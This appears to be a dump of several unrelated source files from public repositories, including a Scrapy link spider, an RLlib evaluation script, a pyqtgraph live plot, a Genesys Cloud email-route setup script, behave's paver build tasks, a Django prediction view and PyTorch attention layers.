allowed_domains = ["data-blogger.com"]
# The URLs to start with
start_urls = ["https://www.data-blogger.com/"]
# This spider has one rule: extract all (unique and canonicalized) links, follow them and parse them using the parse_items method
rules = [
Rule(
LinkExtractor(
canonicalize=True,
unique=True
),
follow=True,
callback="parse_items"
)
]
# Method which starts the requests by visiting all URLs specified in start_urls
def start_requests(self):
for url in self.start_urls:
yield scrapy.Request(url, callback=self.parse, dont_filter=True)
# Method for parsing items
def parse_items(self, response):
# The list of items that are found on the particular page
items = []
# Only extract canonicalized and unique links (with respect to the current page)
links = LinkExtractor(canonicalize=True, unique=True).extract_links(response)
# Now go through all the found links
for link in links:
# Check whether the domain of the URL of the link is allowed; so whether it is in one of the allowed domains
is_allowed = False
for allowed_domain in self.allowed_domains:
if allowed_domain in link.url:
is_allowed = True
# If it is allowed, create a new item and add it to the list of found items
if is_allowed:
item = DatabloggerScraperItem()
item['link_from'] = response.url
item['link_to'] = link.url
items.append(item)
# Return all the found items
return items
```
|
{
"source": "JenishPatel99/SMARTS",
"score": 2
}
|
#### File: SMARTS/benchmark/evaluate.py
```python
import argparse
import ray
import collections
import gym
from pathlib import Path
from ray.rllib.policy.sample_batch import DEFAULT_POLICY_ID
from ray.rllib.env.base_env import _DUMMY_AGENT_ID
from ray.rllib.rollout import default_policy_agent_mapping, DefaultMapping
from ray.rllib.evaluation.worker_set import WorkerSet
from ray.rllib.env import MultiAgentEnv
from ray.rllib.utils.spaces.space_utils import flatten_to_single_ndarray
from smarts.core.agent import AgentSpec
from smarts.core.agent_interface import AgentInterface
from smarts.core.scenario import Scenario
from benchmark.agents import load_config
from benchmark.metrics import basic_metrics as metrics
def parse_args():
parser = argparse.ArgumentParser("Run evaluation")
parser.add_argument(
"scenario", type=str, help="Scenario name",
)
parser.add_argument("--checkpoint", type=str, required=True)
parser.add_argument("--num_steps", type=int, default=1000)
parser.add_argument("--num_episodes", type=int, default=10)
parser.add_argument(
"--paradigm",
type=str,
default="decentralized",
help="Algorithm paradigm, decentralized (default) or centralized",
)
parser.add_argument(
"--headless", default=False, action="store_true", help="Turn on headless mode"
)
parser.add_argument("--config_file", "-f", type=str, required=True)
return parser.parse_args()
def main(
scenario,
config_file,
checkpoint,
num_steps=1000,
num_episodes=10,
paradigm="decentralized",
headless=False,
):
scenario_path = Path(scenario).absolute()
agent_missions_count = Scenario.discover_agent_missions_count(scenario_path)
if agent_missions_count == 0:
agent_ids = ["default_policy"]
else:
agent_ids = [f"AGENT-{i}" for i in range(agent_missions_count)]
config = load_config(config_file, mode="evaluate")
agents = {
agent_id: AgentSpec(
**config["agent"], interface=AgentInterface(**config["interface"])
)
for agent_id in agent_ids
}
config["env_config"].update(
{
"seed": 42,
"scenarios": [str(scenario_path)],
"headless": headless,
"agent_specs": agents,
}
)
obs_space, act_space = config["policy"][1:3]
tune_config = config["run"]["config"]
if paradigm == "centralized":
config["env_config"].update(
{
"obs_space": gym.spaces.Tuple([obs_space] * agent_missions_count),
"act_space": gym.spaces.Tuple([act_space] * agent_missions_count),
"groups": {"group": agent_ids},
}
)
tune_config.update(config["policy"][-1])
else:
policies = {}
for k in agents:
policies[k] = config["policy"][:-1] + (
{**config["policy"][-1], "agent_id": k},
)
tune_config.update(
{
"multiagent": {
"policies": policies,
"policy_mapping_fn": lambda agent_id: agent_id,
}
}
)
ray.init()
trainer_cls = config["trainer"]
trainer_config = {"env_config": config["env_config"]}
if paradigm != "centralized":
trainer_config.update({"multiagent": tune_config["multiagent"]})
else:
trainer_config.update({"model": tune_config["model"]})
trainer = trainer_cls(env=tune_config["env"], config=trainer_config)
trainer.restore(checkpoint)
rollout(trainer, None, num_steps, num_episodes)
trainer.stop()
def rollout(trainer, env_name, num_steps, num_episodes=0):
""" Reference: https://github.com/ray-project/ray/blob/master/rllib/rollout.py
"""
policy_agent_mapping = default_policy_agent_mapping
if hasattr(trainer, "workers") and isinstance(trainer.workers, WorkerSet):
env = trainer.workers.local_worker().env
multiagent = isinstance(env, MultiAgentEnv)
if trainer.workers.local_worker().multiagent:
policy_agent_mapping = trainer.config["multiagent"]["policy_mapping_fn"]
policy_map = trainer.workers.local_worker().policy_map
state_init = {p: m.get_initial_state() for p, m in policy_map.items()}
use_lstm = {p: len(s) > 0 for p, s in state_init.items()}
else:
env = gym.make(env_name)
multiagent = False
try:
policy_map = {DEFAULT_POLICY_ID: trainer.policy}
except AttributeError:
raise AttributeError(
"Agent ({}) does not have a `policy` property! This is needed "
"for performing (trained) agent rollouts.".format(trainer)
)
use_lstm = {DEFAULT_POLICY_ID: False}
action_init = {
p: flatten_to_single_ndarray(m.action_space.sample())
for p, m in policy_map.items()
}
metrics_obj = metrics.Metric(num_episodes)
for episode in range(num_episodes):
mapping_cache = {} # in case policy_agent_mapping is stochastic
obs = env.reset()
agent_states = DefaultMapping(
lambda agent_id: state_init[mapping_cache[agent_id]]
)
prev_actions = DefaultMapping(
lambda agent_id: action_init[mapping_cache[agent_id]]
)
prev_rewards = collections.defaultdict(lambda: 0.0)
done = False
reward_total = 0.0
step = 0
while not done and step < num_steps:
multi_obs = obs if multiagent else {_DUMMY_AGENT_ID: obs}
action_dict = {}
for agent_id, a_obs in multi_obs.items():
if a_obs is not None:
policy_id = mapping_cache.setdefault(
agent_id, policy_agent_mapping(agent_id)
)
p_use_lstm = use_lstm[policy_id]
if p_use_lstm:
a_action, p_state, _ = trainer.compute_action(
a_obs,
state=agent_states[agent_id],
prev_action=prev_actions[agent_id],
prev_reward=prev_rewards[agent_id],
policy_id=policy_id,
)
agent_states[agent_id] = p_state
else:
a_action = trainer.compute_action(
a_obs,
prev_action=prev_actions[agent_id],
prev_reward=prev_rewards[agent_id],
policy_id=policy_id,
)
a_action = flatten_to_single_ndarray(a_action)
action_dict[agent_id] = a_action
prev_actions[agent_id] = a_action
action = action_dict
action = action if multiagent else action[_DUMMY_AGENT_ID]
next_obs, reward, done, info = env.step(action)
metrics_obj.log_step(multi_obs, reward, done, info, episode=episode)
if multiagent:
for agent_id, r in reward.items():
prev_rewards[agent_id] = r
else:
prev_rewards[_DUMMY_AGENT_ID] = reward
# filter dead agents
if multiagent:
next_obs = {
agent_id: obs
for agent_id, obs in next_obs.items()
if not done[agent_id]
}
if multiagent:
done = done["__all__"]
reward_total += sum(reward.values())
else:
reward_total += reward
step += 1
obs = next_obs
print("\nEpisode #{}: steps: {} reward: {}".format(episode, step, reward_total))
if done:
episode += 1
print("\n metrics: {}".format(metrics_obj.compute()))
if __name__ == "__main__":
args = parse_args()
main(
scenario=args.scenario,
config_file=args.config_file,
checkpoint=args.checkpoint,
        num_steps=args.num_steps,
num_episodes=args.num_episodes,
paradigm=args.paradigm,
headless=args.headless,
)
```
#### File: wrappers/rllib/wrapper.py
```python
import copy
from ray.rllib.env.multi_agent_env import MultiAgentEnv
class Wrapper(MultiAgentEnv):
def __init__(self, config):
base_env_cls = config["base_env_cls"]
self.env = base_env_cls(config)
self._agent_keys = list(config["agent_specs"].keys())
self._last_observations = {k: None for k in self._agent_keys}
def _get_observations(self, observations):
return observations
def _get_rewards(self, last_observations, observations, rewards):
return rewards
def _get_infos(self, observations, rewards, infos):
return infos
def _update_last_observation(self, observations):
for agent_id, obs in observations.items():
self._last_observations[agent_id] = copy.copy(obs)
def step(self, agent_actions):
return self.env.step(agent_actions)
def reset(self, **kwargs):
return self.env.reset(**kwargs)
def close(self):
self.env.close()
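

# A hypothetical subclass sketch (not part of SMARTS): it illustrates how the
# _get_* hooks above are usually overridden, here to scale rewards and cache
# the previous observations. All names below are illustrative only.
class ScaledRewardWrapper(Wrapper):
    def _get_rewards(self, last_observations, observations, rewards):
        # Scale every agent's reward; the base class returns rewards unchanged.
        return {agent_id: 0.1 * r for agent_id, r in rewards.items()}

    def step(self, agent_actions):
        obs, rewards, dones, infos = self.env.step(agent_actions)
        rewards = self._get_rewards(self._last_observations, obs, rewards)
        self._update_last_observation(obs)
        return self._get_observations(obs), rewards, dones, infos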
```
|
{
"source": "jenish-rudani/fast-moving-graph",
"score": 3
}
|
#### File: jenish-rudani/fast-moving-graph/main.py
```python
import random
import pyqtgraph as pg
from collections import deque
from pyqtgraph.Qt import QtGui, QtCore
from signal import pause
from threading import Thread
from queue import Queue
import signal
def keyBoardInterruptHandler(signum, frame):
global wObj
print("Signal Caught")
wObj.exit()
signal.signal(signal.SIGTERM, keyBoardInterruptHandler)
signal.signal(signal.SIGINT, keyBoardInterruptHandler)
app = QtGui.QApplication([])
win = pg.GraphicsWindow()
class Graph:
def __init__(self, ):
self.numberofTags = 10
self.count = 0
self.maxLen = 1000 # max number of data points to show on graph
self.db = {}
self.tagCounter = 0
self.running = True
self.app = app
self.win = win
self.q = [Queue() for i in range(10)]
self.dat = [deque() for i in range(10)]
self.plotHandler = None
self.curveHandler = [None for i in range(10)]
self.colorList = ["#803723", "#1ff2ed", "#00fa5c",
"#aff0ed", "#f1af00", "#803723", "#8025ab", "#baa4a4", "#00cc99", "#990099"]
self.initPlotHandler()
self.graphUpdateSpeedMs = 40
self.timer = QtCore.QTimer() # to create a thread that calls a function at intervals
self.timer.timeout.connect(self.update)
self.timer.start(self.graphUpdateSpeedMs)
def initPlotHandler(self):
for i in range(10):
self.plotHandler = self.win.addPlot()
self.plotHandler.setYRange(-20, -70, padding=0.02)
self.plotHandler.setXRange(0, self.maxLen, padding=0.1)
self.win.nextRow()
color = self.colorList[i]
self.curveHandler[i] = self.plotHandler.plot(pen=pg.mkPen(color))
def update(self):
for i in range(len(self.db.keys())):
if len(self.dat[i]) > self.maxLen:
self.dat[i].popleft()
try:
self.dat[i].append(self.q[i].get(block=False))
self.curveHandler[i].setData(self.dat[i])
except Exception:
self.curveHandler[i].setData(self.dat[i])
self.app.processEvents()
def yt(self, tag_id, rssi):
print("Count {} | Tag Detected : {} | RSSI : {}".format(
self.count, tag_id, rssi))
if tag_id not in self.db:
print("Not in database")
self.db[tag_id] = self.tagCounter
self.tagCounter += 1
self.count += 1
n = self.db[tag_id]
if len(self.dat[n]) > self.maxLen:
self.dat[n].popleft()
self.dat[n].append(rssi)
self.curveHandler[n].setData(self.dat[n])
self.app.processEvents()
def randomDataGenerator(self):
a = ['111', '222', '333', '444', '555', '666', '777', '888', '999', '000']
while self.running:
randomIndex = random.randint(0, 9)
temp = -random.randint(15, 55)
tag = a[randomIndex]
self.yt(tag, temp)
def exit(self):
self.running = False
import time
time.sleep(1)
QtGui.QApplication.closeAllWindows()
def main(self):
print("Starting Reading")
self.randomDataGenerator()
print("Reading Stopped")
if __name__ == '__main__':
try:
a = QtGui.QApplication.instance()
wObj = Graph()
T1 = Thread(target=wObj.main)
T1.daemon = True
T1.start()
a.exec_()
except Exception as e:
print(e)
```
|
{
"source": "jenissabarrera/email-aws-comprehend-blueprint",
"score": 2
}
|
#### File: email_flow/scripts/manage_flow.py
```python
import subprocess
import sys
import os
import time
import PureCloudPlatformClientV2
SCRIPT_PATH = sys.path[0]
CLIENT_ID = os.environ["GENESYSCLOUD_OAUTHCLIENT_ID"]
CLIENT_SECRET = os.environ["GENESYSCLOUD_OAUTHCLIENT_SECRET"]
CLIENT_REGION = os.environ["GENESYSCLOUD_REGION"]
CLIENT_REGION = os.environ["GENESYSCLOUD_ARCHY_REGION"]
CLIENT_API_REGION = os.environ["GENESYSCLOUD_API_REGION"]
PureCloudPlatformClientV2.configuration.host = CLIENT_API_REGION
apiClient = PureCloudPlatformClientV2.api_client.ApiClient().get_client_credentials_token(CLIENT_ID, CLIENT_SECRET)
architectApi = PureCloudPlatformClientV2.ArchitectApi(apiClient)
routingApi = PureCloudPlatformClientV2.RoutingApi(apiClient)
ACTION = sys.argv[1]
TARGET_DOMAIN = sys.argv[2]
TARGET_DOMAIN_NAME = sys.argv[3]
def deleteEmailRoute():
print("\nDeleting email route for target domain: \n")
results = routingApi.get_routing_email_domain_routes(TARGET_DOMAIN)
if len(results.entities)>0:
routeId = results.entities[0].id
routingApi.delete_routing_email_domain(routeId)
print("Successfully deleted email route for target domain: {}".format(TARGET_DOMAIN))
def findFlowId():
print("Finding flow id for EmailAWSComprehend flow\n")
results = architectApi.get_flows(name_or_description="EmailAWSComprehendFlow")
flowId = results.entities[0].id
print("Flow id found for EmailAWSComprehend flow: {}\n".format(flowId))
return flowId
def createEmailRoute():
flowId = findFlowId()
print("Creating email route 'support' for flow id: {}\n".format(flowId))
body = PureCloudPlatformClientV2.InboundRoute()
flow = PureCloudPlatformClientV2.DomainEntityRef()
flow.id=flowId
body.pattern="support"
body.from_name="Financial Services Support"
body.from_email= "support@" + TARGET_DOMAIN + "." + TARGET_DOMAIN_NAME
body.flow=flow
routingApi.post_routing_email_domain_routes(TARGET_DOMAIN + "." + TARGET_DOMAIN_NAME,body)
print("Email route 'support' created for flow id: {}\n".format(flowId))
def createArchyFlow():
print("Creating Archy flow \n")
cmd = "archy publish --forceUnlock --file={}/EmailComprehendFlow.yaml --clientId {} --clientSecret {} --location {} --overwriteResultsFile --resultsFile {}/output/results.json".format(
SCRIPT_PATH, CLIENT_ID, CLIENT_SECRET, CLIENT_REGION, SCRIPT_PATH
)
time.sleep(10)
subprocess.run(cmd, shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=True)
time.sleep(10)
flowId = findFlowId()
print("Archy flow created with flow id: {}\n".format(flowId))
def deleteArchyFlow():
flowId = findFlowId()
time.sleep(20.0)
architectApi.delete_flow(flowId)
print("Archy flow {} deleted\n".format(flowId))
if ACTION == "CREATE":
deleteEmailRoute()
createArchyFlow()
createEmailRoute()
if ACTION == "DELETE":
deleteEmailRoute()
deleteArchyFlow()
```
|
{
"source": "jenisys/behave",
"score": 2
}
|
#### File: jenisys/behave/pavement.py
```python
from paver.easy import *
import os
import sys
sys.path.insert(0, ".")
# -- USE PAVER EXTENSIONS: tasks, utility functions
# from paver.setuputils import setup, install_distutils_tasks
# import paver.doctools
from paver_ext.pip_download import download_deps, localpi
from paver_ext.python_checker import pychecker, pylint
from paver_ext.paver_consume_args import Cmdline
from paver_ext import paver_require, paver_patch
paver_require.min_version("1.2")
paver_patch.ensure_path_with_pmethods(path)
paver_patch.ensure_path_with_smethods(path)
# -- REQUIRED-FOR: setup, sdist, ...
# NOTE: Adds a lot more python-project related tasks.
# install_distutils_tasks()
# ----------------------------------------------------------------------------
# TASK CONFIGURATION:
# ----------------------------------------------------------------------------
NAME = "behave"
options(
sphinx=Bunch(
docroot="docs",
sourcedir=".",
builddir="../build/docs"
),
minilib=Bunch(
extra_files=[ 'doctools', 'virtual' ]
),
behave_test=Bunch(
default_args=[
"features/",
"tools/test-features/",
"selftest.features/",
"issue.features/",
]
),
pychecker = Bunch(
default_args=NAME
),
pylint = Bunch(
default_args=NAME
),
clean = Bunch(
dirs = [
".cache",
".tox", #< tox build subtree.
"__WORKDIR__", #< behave_test tempdir.
"build", "dist", #< python setup temporary build dir.
"tmp",
"reports", #< JUnit TESTS-*.xml (default directory).
"test_results",
],
files = [
".coverage",
"paver-minilib.zip",
],
walkdirs_patterns = [
"*.egg-info",
"__pycache__",
],
walkfiles_patterns = [
"*.pyc", "*.pyo", "*$py.class",
"*.bak", "*.log", "*.tmp",
".coverage", ".coverage.*",
"pylint_*.txt", "pychecker_*.txt",
"xxx*.*", "testrun*.json",
".DS_Store", "*.~*~", #< MACOSX
],
),
pip = Bunch(
requirements_files=[
"requirements.txt",
"requirements-develop.txt",
],
# download_dir="downloads",
download_dir= path("$HOME/.pip/downloads").expandvars(),
),
)
# ----------------------------------------------------------------------------
# TASKS:
# ----------------------------------------------------------------------------
@task
@consume_args
def docs(args):
"""
USAGE: paver docs [BUILDER]
Generate the documentation with sphinx (via sphinx-build).
Available builder: html, pdf, ... (default: html)
"""
# -- PREPROCESS: Separate builders/args and options
cmdline = Cmdline.consume(args, default_args=["html"])
cmdopts = cmdline.join_options()
# -- STEP: Build the docs.
for builder in cmdline.args:
sphinx_build(builder, cmdopts=cmdopts)
@task
def linkcheck():
"""Check hyperlinks in documentation."""
sphinx_build("linkcheck")
# ----------------------------------------------------------------------------
# TASK: test
# ----------------------------------------------------------------------------
@task
@consume_args
def test(args):
"""Execute all tests (unittests, feature tests)."""
call_task("unittest")
call_task("behave_test")
@task
@consume_args
def unittest(args):
"""Execute all unittests w/ nosetest runner."""
cmdline = Cmdline.consume(args)
nosetests(cmdline.join_args(), cmdopts=cmdline.join_options())
@task
@consume_args
def behave_test(args, options):
"""Execute all feature tests w/ behave."""
cmdline = Cmdline.consume(args, default_args=options.default_args)
if not cmdline.options:
excluded_tags = "--tags=-xfail --tags=-not_supported"
cmdopts = "-f progress {0}".format(excluded_tags)
else:
cmdopts = cmdline.join_options()
# -- STEP: Collect test groups.
test_groups = []
for prefix in options.default_args:
test_group = []
for arg in cmdline.args:
if arg.startswith(prefix):
test_group.append(arg)
if test_group:
test_groups.append(test_group)
# -- RUN TESTS: All tests at once.
for test_group in test_groups:
args = " ".join(test_group)
behave(args, cmdopts)
# -- RUN TESTS: All tests at once.
# for arg in cmdline.args:
# behave(arg, cmdopts)
# arg = " ".join(args)
# behave(arg, cmdopts)
# ----------------------------------------------------------------------------
# TASK: test coverage
# ----------------------------------------------------------------------------
@task
def coverage_report():
"""Generate coverage report from collected coverage data."""
sh("coverage combine")
sh("coverage report")
sh("coverage html")
info("WRITTEN TO: build/coverage.html/")
# -- DISABLED: sh("coverage xml")
@task
@consume_args
def coverage(args):
"""Run unittests and collect coverage, then generate report."""
cmdline = Cmdline.consume(args)
unittests = [ arg for arg in cmdline.args if arg.startswith("test") ]
behave_tests = [ arg for arg in cmdline.args if not arg.startswith("test") ]
# -- STEP: Check if all tests should be run (normally: no args provided).
should_always_run = not unittests and not behave_tests
if should_always_run:
behave_tests = list(options.behave_test.default_args)
# -- STEP: Run unittests.
if unittests or should_always_run:
nosetests_coverage_run(" ".join(unittests))
# -- STEP: Run feature-tests.
# behave = path("bin/behave").normpath()
if behave_tests or should_always_run:
cmdopts = "-f progress --tags=-xfail "+ cmdline.join_options()
for behave_test_ in behave_tests:
behave_coverage_run(behave_test_, cmdopts=cmdopts)
# -- ALTERNATIVE:
# coverage_run("{behave} --format=progress {cmdopts} {args}".format(
# behave=behave, args=behave_test_, cmdopts=cmdopts))
# -- FINALLY:
call_task("coverage_report")
# ----------------------------------------------------------------------------
# TASK: bump_version
# ----------------------------------------------------------------------------
@task
def bump_version(info, error):
"""Update VERSION.txt"""
try:
from behave import __version__ as VERSION
info("VERSION: %s" % VERSION)
file_ = open("VERSION.txt", "w+")
file_.write("%s\n" % VERSION)
file_.close()
    except Exception as e:
error("Update VERSION.txt FAILED: %s" % e)
# ----------------------------------------------------------------------------
# TASK: clean
# ----------------------------------------------------------------------------
@task
def clean(options):
"""Cleanup the project workspace."""
for dir_ in options.dirs:
path(dir_).rmtree_s()
for pattern in options.walkdirs_patterns:
dirs = path(".").walkdirs(pattern, errors="ignore")
for dir_ in dirs:
dir_.rmtree()
for file_ in options.files:
path(file_).remove_s()
for pattern in options.walkfiles_patterns:
files = path(".").walkfiles(pattern)
for file_ in files:
file_.remove()
# ----------------------------------------------------------------------------
# XML TASKS:
# ----------------------------------------------------------------------------
@task
@consume_args
def junit_validate(args):
"""Validate JUnit report *.xml files with xmllint."""
if not args:
args = [ "reports" ]
# -- PREPROCESS ARGS:
files = []
for arg in args:
path_ = path(arg)
if "*" in arg:
files.extend(path(".").glob(arg))
elif path_.isdir():
files.extend(path_.glob("*.xml"))
else:
files.append(arg)
# -- VALIDATE XML FILES:
xml_schema = "etc/junit.xml/behave_junit.xsd"
problematic = []
for arg in files:
try:
xmllint(arg, schema=xml_schema, options="")
except BuildFailure:
# -- KEEP-GOING: Collect failure and continue. Report errors later.
problematic.append(arg)
# -- SUMMARY:
if problematic:
message = "{0} file(s) with XML validation errors.\n".format(len(problematic))
message += "PROBLEMATIC FILES:\n {0}".format("\n ".join(problematic))
raise BuildFailure(message)
else:
info("SUMMARY: {0} XML file(s) validated.".format(len(files)))
# ----------------------------------------------------------------------------
# PLATFORM-SPECIFIC TASKS: win32
# ----------------------------------------------------------------------------
#if sys.platform == "win32":
# @task
# @consume_args
# def py2exe(args):
# """Run py2exe to build a win32 executable."""
# cmdline = " ".join(args)
# python("setup_py2exe.py py2exe %s" % cmdline)
#
# ----------------------------------------------------------------------------
# UTILS:
# ----------------------------------------------------------------------------
BEHAVE = path("bin/behave").normpath()
XMLLINT = "xmllint"
def python(cmdline, cwd="."):
"""Execute a python script by using the current python interpreter."""
return sh("{python} {cmd}".format(python=sys.executable, cmd=cmdline),
cwd=cwd)
def coverage_run(cmdline):
return sh("coverage run {cmdline}".format(cmdline=cmdline))
# ignore_error=True) #< Show coverage-report even if tests fail.
def nosetests(cmdline, cmdopts=""):
"""Run nosetest command"""
return sh("nosetests {options} {args}".format(options=cmdopts, args=cmdline))
def nosetests_coverage_run(cmdline, cmdopts=""):
"""Collect coverage w/ nose-builtin coverage plugin."""
cmdopts += " --with-coverage --cover-package={package}".format(package=NAME)
return nosetests(cmdline, cmdopts)
def nosetests_coverage_run2(cmdline, cmdopts=""):
"""Collect coverage w/ extra nose-cov plugin."""
cmdopts += " --with-cov --cov={package}".format(package=NAME)
return nosetests(cmdline, cmdopts)
def behave(cmdline, cmdopts=""):
"""Run behave command"""
return sh("{behave} {options} {args}".format(
behave=BEHAVE, options=cmdopts, args=cmdline))
def behave_coverage_run(cmdline, cmdopts=""):
"""Collect coverage w/ behave."""
os.environ["COVERAGE_PROCESS_START"] = path(".coveragerc").abspath()
return behave(cmdline, cmdopts)
def sphinx_build(builder="html", cmdopts=""):
if builder.startswith("-"):
cmdopts += " %s" % builder
builder = ""
sourcedir = options.sphinx.sourcedir
destdir = options.sphinx.builddir
cmd = "sphinx-build {opts} -b {builder} {sourcedir} {destdir}/{builder}"\
.format(builder=builder, sourcedir=sourcedir,
destdir=destdir, opts=cmdopts)
sh(cmd, cwd=options.sphinx.docroot)
def xmllint(cmdline, options=None, schema=None):
if not options:
options = ""
if schema:
options = " --schema {0} {1}".format(schema, options)
cmd = "{xmllint} {options} {cmdline}".format(
xmllint=XMLLINT, options=options, cmdline=cmdline)
sh(cmd, capture=True) #< SILENT: Output only in case of BuildError
class Cmdline(object):
def __init__(self, args=None, options=None):
self.args = args or []
self.options = options or []
def join_args(self, separator=" "):
return separator.join(self.args)
def join_options(self, separator=" "):
return separator.join(self.options)
@classmethod
def consume(cls, args, default_args=None, default_options=None):
args_ = []
options_ = []
for arg in args:
if arg.startswith("-"):
options_.append(arg)
else:
args_.append(arg)
if not args_:
args_ = default_args
if not options_:
options_ = default_options
return cls(args_, options_)
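

# A tiny illustration (assumed, not part of the original pavement.py) of how
# Cmdline.consume separates positional args from "-"-prefixed options.
if __name__ == "__main__":
    example = Cmdline.consume(["--tags=-xfail", "features/"], default_args=["features/"])
    assert example.args == ["features/"]
    assert example.join_options() == "--tags=-xfail"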
```
|
{
"source": "jenisys/vcstool",
"score": 2
}
|
#### File: vcstool/vcstool/util.py
```python
from errno import EACCES, EPERM
import os
from shutil import rmtree as shutil_rmtree
import stat
import sys
def rmtree(path):
kwargs = {}
if sys.platform == 'win32':
kwargs['onerror'] = _onerror_windows
return shutil_rmtree(path, **kwargs)
def _onerror_windows(function, path, excinfo):
if isinstance(excinfo[1], OSError) and excinfo[1].errno in (EACCES, EPERM):
os.chmod(path, stat.S_IWRITE)
function(path)
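

# A small usage sketch (assumed, not part of vcstool): rmtree behaves like
# shutil.rmtree, but on Windows it clears the read-only bit and retries when a
# removal fails with EACCES/EPERM (e.g. files inside a .git directory).
if __name__ == "__main__":
    import tempfile
    tmp_dir = tempfile.mkdtemp()
    open(os.path.join(tmp_dir, "dummy.txt"), "w").close()
    rmtree(tmp_dir)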
```
|
{
"source": "jenith-hue/Lung_Cancer",
"score": 2
}
|
#### File: Lung_Cancer/autism/models.py
```python
from django.contrib import admin
from django.db import models
from datetime import date
class predict(models.Model):
type1 = models.CharField(max_length=200, blank=False)
type2 = models.CharField(max_length=200, blank=False)
type3 = models.CharField(max_length=200, blank=False)
type4 = models.CharField(max_length=200, blank=False)
type5 = models.CharField(max_length=200, blank=False)
type6 = models.CharField(max_length=200, blank=False)
type7 = models.CharField(max_length=200, blank=False)
type8 = models.CharField(max_length=200, blank=False)
class Meta:
abstract = True
def __str__(self):
        return 'Type: {0}'.format(self.type1)
```
#### File: Lung_Cancer/autism/views.py
```python
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponseRedirect
from .forms import Predict
from .ML_ALGORITHM import you
import numpy
def index(request):
return render(request, 'autism/home.html')
def predict(request):
return render(request, 'autism/predict.html')
def predicted(request):
if request.method == "POST":
form = Predict(request.POST)
type1 = int(request.POST['type1'])
type2 = int(request.POST['type2'])
type3 = int(request.POST['type3'])
type4 = int(request.POST['type4'])
type5 = int(request.POST['type5'])
type6 = float(request.POST['type6'])
type7 = float(request.POST['type7'])
type8 = int(request.POST['type8'])
x= []
new_list = []
x.append(type1)
x.append(type2)
x.append(type3)
x.append(type4)
x.append(type5)
x.append(type6)
x.append(type7)
x.append(type8)
        # Avoid shadowing the built-in list() by storing the model output
        # under a descriptive name.
        predictions = you.getPrediction(x)
        yes = predictions[0]
        no = 100 - predictions[0]
        new_list.append(yes)
        new_list.append(no)
        label = ['yes', 'no']
        zipped_list = zip(predictions)
        context = {
            'zipped_list': zipped_list,
            'list': new_list,
            'label': label,
        }
        print(predictions)
return render(request, 'autism/predicted.html',context)
else:
form = Predict()
return render(request,'autism/predicted.html',{'form':form})
def restapi(request):
    # Query parameters arrive as strings, so cast them to the same numeric
    # types used in predicted() before passing them to the model.
    type1 = int(request.GET.get('value1', -1))
    type2 = int(request.GET.get('value2', -1))
    type3 = int(request.GET.get('value3', -1))
    type4 = int(request.GET.get('value4', -1))
    type5 = int(request.GET.get('value5', -1))
    type6 = float(request.GET.get('value6', -1))
    type7 = float(request.GET.get('value7', -1))
    type8 = int(request.GET.get('value8', -1))
x= []
new_list = []
x.append(type1)
x.append(type2)
x.append(type3)
x.append(type4)
x.append(type5)
x.append(type6)
x.append(type7)
x.append(type8)
    predictions = you.getPrediction(x)
    yes = predictions[0]
    no = 100 - predictions[0]
    new_list.append(yes)
    new_list.append(no)
    label = ['yes', 'no']
    zipped_list = zip(predictions)
    context = {
        'zipped_list': zipped_list,
        'list': new_list,
        'label': label,
    }
    print(predictions)
return render(request, 'autism/predicted.html',context)
```
|
{
"source": "jeniyat/Bert-OverFlow",
"score": 2
}
|
#### File: code/Attentive_BiLSTM/HAN.py
```python
import torch
import torch.nn as nn
import torch.autograd as autograd
import torch.nn.functional as F
from utils_so import *
from config_so import parameters
torch.backends.cudnn.deterministic = True
torch.manual_seed(parameters["seed"])
class Embeeding_Attn(nn.Module):
def __init__(self):
super(Embeeding_Attn, self).__init__()
self.max_len = 3
self.input_dim = 1824
self.hidden_dim = 150
self.bidirectional = True
self.drop_out_rate = 0.5
self.context_vector_size = [parameters['embedding_context_vecotr_size'], 1]
self.drop = nn.Dropout(p=self.drop_out_rate)
self.word_GRU = nn.GRU(input_size=self.input_dim,
hidden_size=self.hidden_dim,
bidirectional=self.bidirectional,
batch_first=True)
self.w_proj = nn.Linear(in_features=2*self.hidden_dim ,out_features=2*self.hidden_dim)
self.w_context_vector = nn.Parameter(torch.randn(self.context_vector_size).float())
self.softmax = nn.Softmax(dim=1)
init_gru(self.word_GRU)
    def forward(self, x):
        x, _ = self.word_GRU(x)
        # Score each timestep against a learned context vector, weight the GRU
        # states by the softmax-normalised scores, then sum over the sequence
        # dimension to obtain one pooled vector per example.
        Hw = torch.tanh(self.w_proj(x))
        w_score = self.softmax(Hw.matmul(self.w_context_vector))
        x = x.mul(w_score)
        x = torch.sum(x, dim=1)
        return x
class Word_Attn(nn.Module):
def __init__(self):
super(Word_Attn, self).__init__()
self.max_len = 92
self.input_dim = 300
self.hidden_dim = 150
self.bidirectional = True
self.drop_out_rate = 0.5
self.context_vector_size = [parameters['word_context_vecotr_size'] , 1]
self.drop = nn.Dropout(p=self.drop_out_rate)
self.word_GRU = nn.GRU(input_size=self.input_dim,
hidden_size=self.hidden_dim,
bidirectional=self.bidirectional,
batch_first=True)
self.w_proj = nn.Linear(in_features=2*self.hidden_dim ,out_features=2*self.hidden_dim)
self.w_context_vector = nn.Parameter(torch.randn(self.context_vector_size).float())
self.softmax = nn.Softmax(dim=1)
init_gru(self.word_GRU)
    def forward(self, x):
        x, _ = self.word_GRU(x)
        # Same scoring scheme as Embeeding_Attn, but the weighted states are
        # returned per timestep instead of being pooled.
        Hw = torch.tanh(self.w_proj(x))
        w_score = self.softmax(Hw.matmul(self.w_context_vector))
        x = x.mul(w_score)
        # print(x.size())
        return x
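

# A minimal shape-check sketch (not part of the original module). It assumes
# parameters['word_context_vecotr_size'] == 300 and
# parameters['embedding_context_vecotr_size'] == 300 (i.e. 2 * hidden_dim),
# and that the config/utils imports above resolve.
if __name__ == "__main__":
    word_attn = Word_Attn()
    dummy_words = torch.randn(4, 92, 300)
    print(word_attn(dummy_words).shape)    # expected: torch.Size([4, 92, 300])

    embed_attn = Embeeding_Attn()
    dummy_embeds = torch.randn(4, 3, 1824)
    print(embed_attn(dummy_embeds).shape)  # expected: torch.Size([4, 300])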
```
#### File: code/Attentive_BiLSTM/train_so.py
```python
from __future__ import print_function
import optparse
import itertools
from collections import OrderedDict
import torch
import time
import pickle
from torch.optim import lr_scheduler
from torch.autograd import Variable
# import matplotlib.pyplot as plt #JT: commented it
import sys
import os
import json
import numpy as np
import codecs
# import Visdom #JT: commented it
# from utils import *
# from loader import *
# from config import opts
# from model_wo_char import BiLSTM_CRF
from model import BiLSTM_CRF
import utils_so as utils #JT: utils for SO
import loader_so as loader #JT: loader for SO
